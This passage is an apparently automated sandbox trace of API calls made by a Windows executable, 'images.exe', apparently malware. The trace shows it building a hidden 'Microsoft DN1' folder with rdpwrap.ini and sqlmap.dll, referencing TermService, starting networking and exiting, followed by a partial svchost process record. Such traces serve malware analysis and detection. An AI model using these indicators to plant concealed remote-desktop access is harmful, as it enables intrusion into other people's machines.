-1 [0198.189] lstrcmpA (lpString1="DlgDirSelectComboBoxExW", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DlgDirSelectExA", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DlgDirSelectExW", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DoSoundConnect", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DoSoundDisconnect", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DragDetect", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DragObject", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawAnimatedRects", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawCaption", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawCaptionTempA", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawCaptionTempW", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawEdge", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawFocusRect", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawFrame", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawFrameControl", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawIcon", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawIconEx", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawMenuBar", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawMenuBarTemp", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawStateA", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawStateW", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawTextA", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawTextExA", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawTextExW", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DrawTextW", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DwmGetDxSharedSurface", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DwmStartRedirection", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="DwmStopRedirection", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="EditWndProc", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="EmptyClipboard", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="EnableMenuItem", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="EnableScrollBar", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="EnableWindow", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="EndDeferWindowPos", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="EndDialog", lpString2="GetRawInputData") returned -1 [0198.190] lstrcmpA (lpString1="EndMenu", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EndPaint", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EndTask", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnterReaderModeHelper", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumChildWindows", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumClipboardFormats", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumDesktopWindows", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumDesktopsA", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumDesktopsW", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumDisplayDevicesA", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumDisplayDevicesW", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumDisplayMonitors", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumDisplaySettingsA", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumDisplaySettingsExA", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumDisplaySettingsExW", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumDisplaySettingsW", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumPropsA", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumPropsExA", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumPropsExW", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumPropsW", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumThreadWindows", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumWindowStationsA", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumWindowStationsW", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EnumWindows", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="EqualRect", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="ExcludeUpdateRgn", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="ExitWindowsEx", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="FillRect", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="FindWindowA", lpString2="GetRawInputData") returned -1 [0198.191] lstrcmpA (lpString1="FindWindowExA", lpString2="GetRawInputData") returned -1 [0198.192] GetProcessHeap () returned 0x610000 [0198.192] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x18) returned 0x637220 [0198.192] lstrlenW (lpString="TermService") returned 11 [0198.192] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0198.192] lstrlenW (lpString="TermService") returned 11 [0198.192] lstrcpyW (in: lpString1=0x5e0000, lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0198.192] lstrlenW (lpString="TermService") returned 11 [0198.192] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000 [0198.193] lstrcatW (in: lpString1="", lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0198.193] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.193] lstrlenW (lpString="%ProgramFiles%") returned 14 [0198.193] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0198.193] lstrlenW (lpString="%ProgramFiles%") returned 14 [0198.193] lstrcpyW (in: lpString1=0x5e0000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0198.193] lstrlenW (lpString="%ProgramFiles%") returned 14 [0198.193] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x600000 [0198.193] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0198.193] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.194] GetCurrentProcess () returned 0xffffffff [0198.194] GetModuleHandleA (lpModuleName="kernel32") returned 0x76210000 [0198.194] GetProcAddress (hModule=0x76210000, lpProcName="IsWow64Process") returned 0x7622195e [0198.194] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x29fdf4 | out: Wow64Process=0x29fdf4) returned 1 [0198.194] VirtualFree (lpAddress=0x600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.194] lstrlenW (lpString="%ProgramW6432%") returned 14 [0198.194] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0198.194] lstrlenW (lpString="%ProgramW6432%") returned 14 [0198.194] lstrcpyW (in: lpString1=0x5e0000, lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%" [0198.194] lstrlenW (lpString="%ProgramW6432%") returned 14 [0198.194] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x600000 [0198.195] lstrcatW (in: lpString1="", lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%" [0198.195] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.195] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x29fa04, nSize=0x1ff | out: lpDst="C:\\Program Files") returned 0x11 [0198.195] lstrlenW (lpString="C:\\Program Files") returned 16 [0198.195] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0198.195] lstrlenW (lpString="C:\\Program Files") returned 16 [0198.195] lstrcpyW (in: lpString1=0x5e0000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0198.195] lstrlenW (lpString="C:\\Program Files") returned 16 [0198.195] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0198.195] lstrcpyW (in: lpString1=0x8a0000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0198.195] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.196] VirtualFree (lpAddress=0x600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.196] lstrlenW (lpString="%ProgramFiles%") returned 14 [0198.196] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0198.196] lstrlenW (lpString="%ProgramFiles%") returned 14 [0198.196] lstrcpyW (in: lpString1=0x5e0000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0198.196] lstrlenW (lpString="%ProgramFiles%") returned 14 [0198.196] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x600000 [0198.196] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0198.196] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.197] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0198.197] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0198.197] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0198.197] lstrcpyW (in: lpString1=0x5e0000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1" [0198.197] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0198.197] lstrlenW (lpString="C:\\Program Files") returned 16 [0198.197] VirtualQuery (in: lpAddress=0x8a0000, lpBuffer=0x29fda8, dwLength=0x1c | out: lpBuffer=0x29fda8*(BaseAddress=0x8a0000, AllocationBase=0x8a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0198.197] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0198.197] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.197] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1" [0198.197] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.198] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0198.198] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0198.198] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0198.198] lstrcpyW (in: lpString1=0x5e0000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1" [0198.198] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0198.198] lstrlenW (lpString="%ProgramFiles%") returned 14 [0198.198] VirtualQuery (in: lpAddress=0x600000, lpBuffer=0x29fda8, dwLength=0x1c | out: lpBuffer=0x29fda8*(BaseAddress=0x600000, AllocationBase=0x600000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0198.198] VirtualAlloc (lpAddress=0x0, dwSize=0x3c, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0198.198] VirtualFree (lpAddress=0x600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.198] lstrcatW (in: lpString1="%ProgramFiles%", lpString2="\\Microsoft DN1" | out: lpString1="%ProgramFiles%\\Microsoft DN1") returned="%ProgramFiles%\\Microsoft DN1" [0198.198] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.199] SHCreateDirectoryExW (hwnd=0x0, pszPath="C:\\Program Files\\Microsoft DN1" (normalized: "c:\\program files\\microsoft dn1"), psa=0x0) returned 183 [0198.199] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0198.199] VirtualAlloc (lpAddress=0x0, dwSize=0x3e, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0198.199] lstrcpyW (in: lpString1=0x5e0000, lpString2="C:\\Program Files\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1" [0198.199] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0198.199] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x600000 [0198.199] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0198.199] lstrcpyW (in: lpString1=0x600000, lpString2="\\rdpwrap.ini" | out: lpString1="\\rdpwrap.ini") returned="\\rdpwrap.ini" [0198.199] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0198.199] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0198.200] VirtualQuery (in: lpAddress=0x5e0000, lpBuffer=0x29fda8, dwLength=0x1c | out: lpBuffer=0x29fda8*(BaseAddress=0x5e0000, AllocationBase=0x5e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0198.200] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0198.200] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.200] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\rdpwrap.ini" | out: lpString1="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini") returned="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini" [0198.200] VirtualFree (lpAddress=0x600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.200] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0198.200] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0198.200] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0198.200] lstrcpyW (in: lpString1=0x5e0000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll" [0198.200] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0198.200] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0198.201] VirtualQuery (in: lpAddress=0x8b0000, lpBuffer=0x29fda8, dwLength=0x1c | out: lpBuffer=0x29fda8*(BaseAddress=0x8b0000, AllocationBase=0x8b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0198.201] VirtualAlloc (lpAddress=0x0, dwSize=0x56, flAllocationType=0x3000, flProtect=0x4) returned 0x600000 [0198.201] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.201] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="C:\\Program Files\\Microsoft DN1\\sqlmap.dll") returned="C:\\Program Files\\Microsoft DN1\\sqlmap.dll" [0198.201] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.201] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0198.201] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0198.201] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0198.201] lstrcpyW (in: lpString1=0x5e0000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll" [0198.202] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0198.202] lstrlenW (lpString="%ProgramFiles%\\Microsoft DN1") returned 28 [0198.202] VirtualQuery (in: lpAddress=0x8a0000, lpBuffer=0x29fda8, dwLength=0x1c | out: lpBuffer=0x29fda8*(BaseAddress=0x8a0000, AllocationBase=0x8a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0198.202] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0198.202] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.202] lstrcatW (in: lpString1="%ProgramFiles%\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll") returned="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll" [0198.202] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.242] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0198.243] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x19c [0198.243] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x54cb9c | out: lpWSAData=0x54cb9c) returned 0 [0198.248] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0198.248] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1b4 [0198.248] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x54cd7c | out: lpWSAData=0x54cd7c) returned 0 [0198.248] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1b8 [0198.249] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0198.249] GetTickCount () returned 0x113f3a2 [0198.249] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x29f8d0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\images.exe")) returned 0x38 [0198.249] GetProcessHeap () returned 0x610000 [0198.249] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x400000) returned 0x27b0020 [0198.249] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\images.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0198.249] GetFileSize (in: hFile=0x1bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb7400 [0198.249] ReadFile (in: hFile=0x1bc, lpBuffer=0x27b0020, nNumberOfBytesToRead=0xb7400, lpNumberOfBytesRead=0x29f7c4, lpOverlapped=0x0 | out: lpBuffer=0x27b0020*, lpNumberOfBytesRead=0x29f7c4*=0xb7400, lpOverlapped=0x0) returned 1 [0198.262] CloseHandle (hObject=0x1bc) returned 1 [0198.263] GetProcessHeap () returned 0x610000 [0198.263] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x6443a8 [0198.263] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="\x07©\x97U") returned 0x1bc [0198.263] GetLastError () returned 0xb7 [0198.263] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.263] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.263] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.263] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.263] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.263] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.263] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.263] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.263] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.263] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.263] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.263] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.263] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.264] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.264] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.264] CoUninitialize () [0198.266] CoUninitialize () [0198.266] VirtualFree (lpAddress=0x62e750, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.266] VirtualFree (lpAddress=0x62e7a8, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.266] ReleaseMutex (hMutex=0xb8) returned 0 [0198.266] CloseHandle (hObject=0xb8) returned 1 [0198.266] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.267] VirtualFree (lpAddress=0x3e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.267] VirtualFree (lpAddress=0x3d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.267] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.267] VirtualFree (lpAddress=0x330000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.267] VirtualFree (lpAddress=0x320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.268] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.268] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.268] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.268] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.268] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.268] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.268] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.268] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.268] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.268] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.268] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.268] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.268] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.268] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.268] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.268] ReleaseMutex (hMutex=0x198) returned 0 [0198.268] CloseHandle (hObject=0x198) returned 1 [0198.269] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.269] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.269] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.269] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.269] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.269] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.269] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.269] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.269] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.269] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.269] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.269] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.269] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.269] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.269] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.269] VirtualFree (lpAddress=0x600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.270] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.270] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.270] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.270] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.270] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.270] WSACleanup () returned 0 [0198.270] ReleaseMutex (hMutex=0x1b4) returned 0 [0198.270] CloseHandle (hObject=0x1b4) returned 1 [0198.270] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.270] WSACleanup () returned 0 [0198.272] ReleaseMutex (hMutex=0x19c) returned 0 [0198.272] CloseHandle (hObject=0x19c) returned 1 [0198.272] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.272] ReleaseMutex (hMutex=0x1b8) returned 0 [0198.272] CloseHandle (hObject=0x1b8) returned 1 [0198.272] ExitProcess (uExitCode=0x0) Process: id = "26" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xca0e000" os_pid = "0x2c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "13" os_parent_pid = "0x1cc" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b77f" [0xc000000f], "LOCAL" [0x7] Thread: id = 239 os_tid = 0x4fc Thread: id = 240 os_tid = 0x50c Thread: id = 241 os_tid = 0x600 Thread: id = 242 os_tid = 0x678 Thread: id = 243 os_tid = 0x6e0 Thread: id = 244 os_tid = 0x6cc Thread: id = 245 os_tid = 0x698 Thread: id = 246 os_tid = 0x694 Thread: id = 247 os_tid = 0x690 Thread: id = 248 os_tid = 0x5b0 Thread: id = 249 os_tid = 0x454 Thread: id = 250 os_tid = 0x43c Thread: id = 251 os_tid = 0x430 Thread: id = 252 os_tid = 0x410 Thread: id = 253 os_tid = 0x3c4 Thread: id = 254 os_tid = 0x3bc Thread: id = 255 os_tid = 0x3ac Thread: id = 256 os_tid = 0x300 Thread: id = 257 os_tid = 0x2fc Thread: id = 258 os_tid = 0x2e0 Thread: id = 259 os_tid = 